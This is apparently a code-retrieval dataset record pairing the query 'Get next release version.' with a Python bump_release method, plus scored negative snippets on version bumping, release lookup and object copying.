self.editor_extra.copy(),\n self.authors.copy(),\n self.tags.copy(),\n self.desc,\n self.icons.copy(),\n self.ent_count,\n self.url,\n self.all_name,\n self.all_icon,\n self.source,\n )", "def copy(self):\n new_game = Game(self.name, *self.agents, independent_update=self.independent_update, default_run_kwargs=self.default_run_kwargs, _set_defaults=False)\n new_game.i = self.i\n new_game.env = self.env_copy()\n new_game.env[\"game\"] = new_game\n return new_game", "def copy(self):\n node_new = Node(self.state.copy(), self.parent, self.children.copy(), self.RRT, self.path_length)\n node_new.vs = self.vs.copy()\n node_new.RRT = self.RRT\n node_new.observed = self.observed\n node_new.observation_node = self.observation_node\n node_new.observation_area = self.observation_area\n\n return node_new", "def copy(self):\n state = State(self.state_object, self.compute_dag)\n state.stage_id_map = self.stage_id_map.copy()\n return state", "def clone(self):\n return _libsbml.SBase_clone(self)", "def copy(self):\r\n return copy.deepcopy(self)", "def copy(self: _R) -> _R:\n return self.__class__(\n self.name,\n list(self.children),\n docstring=self.docstring,\n stringify=self.is_stringified(),\n replace_with_dict=self.replace_with_dict,\n )" ]
[ "0.69766486", "0.68571734", "0.6853616", "0.6696837", "0.66747206", "0.6633099", "0.6621376", "0.6601393", "0.65898925", "0.65894204", "0.65894204", "0.6584453", "0.65257055", "0.6520473", "0.6510755", "0.6490696", "0.6472705", "0.6456239", "0.6437196", "0.6430004", "0.64159894", "0.64020145", "0.63995486", "0.6398769", "0.6379477", "0.6373328", "0.6372899", "0.63652354", "0.6357272", "0.63355994", "0.63261974", "0.63116693", "0.6300793", "0.6287087", "0.627001", "0.62437487", "0.6240778", "0.6238915", "0.6224349", "0.6223374", "0.6221226", "0.62078524", "0.62078524", "0.62078524", "0.62076294", "0.62056774", "0.6198215", "0.6198215", "0.6198215", "0.6191457", "0.6179976", "0.6177097", "0.6176996", "0.6167757", "0.6145398", "0.611663", "0.6099046", "0.6095142", "0.607062", "0.6066057", "0.6058061", "0.6056581", "0.6052864", "0.6052864", "0.6052864", "0.60495865", "0.6047195", "0.6042214", "0.60373", "0.6034124", "0.6034124", "0.6034055", "0.60327876", "0.6025493", "0.6011092", "0.60008633", "0.59957224", "0.59852237", "0.59816915", "0.59805566", "0.59805566", "0.59805566", "0.59805566", "0.59714997", "0.5955554", "0.5950496", "0.5948289", "0.59465545", "0.5942438", "0.5941593", "0.5938352", "0.59373975", "0.5936615", "0.5935409", "0.59337926", "0.5922805", "0.5918981", "0.5915814", "0.5913418", "0.59121317" ]
0.63095486
32
Get next release version.
def bump_release( self: _R, release_type: Literal["major", "minor", "micro"] = VersionParts.MICRO, inc: int = 1, ) -> _R: if release_type == VersionParts.MAJOR: return self.bump_major(inc) if release_type == VersionParts.MINOR: return self.bump_minor(inc) return self.bump_micro(inc)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_current_release():\n return _CURRENT_RELEASE", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_version():\n click.echo(get_current_version_number())", "def is_release():\n return VERSION[-1]", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def get_version(self):\r\n\r\n return self.versions[0].number", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def next_release_date(date):\n df = get_release_dates()\n df = df[df['ReleaseDate'] > date]\n return df['ReleaseDate'].iloc[0]", "def get_version():\n return '%d.%d.%d' % version_info", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def latest(cls):\n releases = cls.query.all()\n if len(releases) == 0:\n return None\n\n releases.sort(key=lambda x: x.version)\n return releases[-1]", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def version_max():\n return VERSION_MAX", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return 1", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def release(self) -> pulumi.Output['outputs.ReleaseResponse']:\n return pulumi.get(self, \"release\")", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_version(self, name: str, version=None) -> int:\n division, is_vertebrate = self.get_division(name)\n if version is None:\n latest_version = self.get_release(is_vertebrate)\n return latest_version\n\n if not str(version).isdecimal():\n raise TypeError(\"Version must be a number\")\n version = int(version)\n\n all_versions = self.get_releases(is_vertebrate)\n ensembl = f\"Ensembl{'' if is_vertebrate else 'Genomes'}\"\n if version not in all_versions:\n raise ValueError(\n f\"{ensembl} release version {version} \"\n f\"not found. Available versions: {all_versions}\"\n )\n\n releases = self.releases_with_assembly(name)\n if version not in releases:\n raise FileNotFoundError(\n f\"{name} not found on {ensembl} release {version}. \"\n f\"Available on release versions: {releases}\"\n )\n return version", "def get_version():\r\n return __version__", "def next_available_number(cls):\n try:\n return cls.objects.latest().number + 1\n except cls.DoesNotExist:\n return 1", "async def get_latest_version(self, pkg: str) -> Optional[str]:\n return None", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def test_release_update_available_CURRENT(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n self.assertRaises(U.RequiredComponentError, self.u.release_update_available, errorsto='exception')", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def get_new_build(old_version, new_version, build):\n\n # Version did not change, increment the current build number\n if old_version == new_version:\n return str(int(build) + 1)\n\n # Version changed, start over at 1\n else:\n return str(1)", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def available_version(self) -> Sequence['outputs.VersionResponse']:\n return pulumi.get(self, \"available_version\")", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def switch_to_latest_version(self):\n self.current_version = Version.objects.filter(is_published=True).latest()\n self.save()", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_version(self):\n return self.__make_api_call('get/version')", "def get_version(self):\n return self.api_version", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_version(self) -> str:\n return versioning.get_version()", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def get_version(self):\n\n r = self._create_operation_request(self, method=\"GET\")\n root_info = send_session_request(self._session, r).json()\n return root_info[\"currentVersion\"]", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def get_version(self):\n return self.version", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_release(\n self,\n ) -> Callable[[cloud_deploy.GetReleaseRequest], cloud_deploy.Release]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_release\" not in self._stubs:\n self._stubs[\"get_release\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/GetRelease\",\n request_serializer=cloud_deploy.GetReleaseRequest.serialize,\n response_deserializer=cloud_deploy.Release.deserialize,\n )\n return self._stubs[\"get_release\"]", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version():\n return about.get_version()", "def get_version(self):\n return self.cur_config['version']['name']" ]
[ "0.8136026", "0.8127919", "0.7517721", "0.71033996", "0.6974199", "0.6932763", "0.6864649", "0.6853223", "0.6828289", "0.6774772", "0.67444694", "0.6615308", "0.6605916", "0.6588041", "0.65674776", "0.65634", "0.65570605", "0.6548462", "0.6492869", "0.64794105", "0.6404592", "0.6335719", "0.63208365", "0.631665", "0.6316141", "0.62935823", "0.62629706", "0.62320495", "0.6178687", "0.6120628", "0.6096705", "0.60799634", "0.60785675", "0.60503054", "0.60444444", "0.60434645", "0.60283756", "0.6023517", "0.60063714", "0.60038364", "0.597773", "0.59659004", "0.59657574", "0.59581727", "0.59360135", "0.5934122", "0.5929531", "0.5926995", "0.591262", "0.5900893", "0.5895264", "0.5889708", "0.58864063", "0.588424", "0.588418", "0.5877367", "0.58642745", "0.5838755", "0.58357346", "0.5832884", "0.5818726", "0.5798821", "0.5794198", "0.57795024", "0.5769929", "0.57604957", "0.5755541", "0.5754152", "0.5747085", "0.5745661", "0.57389385", "0.57363695", "0.57363695", "0.57363695", "0.5735756", "0.5731898", "0.5729765", "0.57276005", "0.5725639", "0.5723025", "0.5721192", "0.5716473", "0.5714247", "0.5713745", "0.5706942", "0.570206", "0.5692164", "0.56874573", "0.56873256", "0.5682467", "0.5682467", "0.5682467", "0.5682467", "0.5682467", "0.56814724", "0.56744254", "0.56706244", "0.5665648", "0.56628984", "0.5658192", "0.5657588" ]
0.0
-1
Get next major version.
def bump_major(self: _R, inc: int = 1) -> _R: if not self.is_stable and self.minor == 0 and self.micro == 0: return self.get_stable().bump_major(inc - 1) return self._replace( BaseVersion( epoch=0, release=(self.major + inc, 0, 0), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def major_version(self) -> str:\n return pulumi.get(self, \"major_version\")", "def get_major_version(version):\n return str(check_version(version)[0])", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def major_version(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"major_version\")", "def major_version(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"major_version\")", "def _major_version(self):\n version_tuple = StrictVersion(self.plugin.version).version\n major = '.'.join(map(str, version_tuple[:2]))\n\n return major", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def version_min():\n return VERSION_MIN", "def major_version(self):\n return self.unpack_dword(0x14)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n click.echo(get_current_version_number())", "def get_version():\n return 1", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def version_major(self):\n assert self._version_major != NotImplemented\n return self._version_major", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = 